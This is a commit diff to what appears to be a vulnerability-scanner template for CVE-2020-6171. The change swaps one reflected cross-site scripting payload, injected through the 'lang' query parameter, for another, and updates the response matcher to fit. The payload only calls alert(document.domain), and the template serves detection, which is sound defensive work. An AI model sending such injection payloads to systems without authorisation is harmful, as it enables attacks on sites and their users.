Update CVE 2020-6171.yaml

patch-1
Prince Chaddha 2021-07-27 11:58:42 +05:30 committed by GitHub
parent 751626e435
commit 76a39c9ef5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -12,13 +12,13 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}?lang=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cp%20class=%22&p=1" - "{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- '"><script>alert(document.domain)</script>' - '"></script><script>alert(document.domain)</script>'
part: body part: body
- type: status - type: status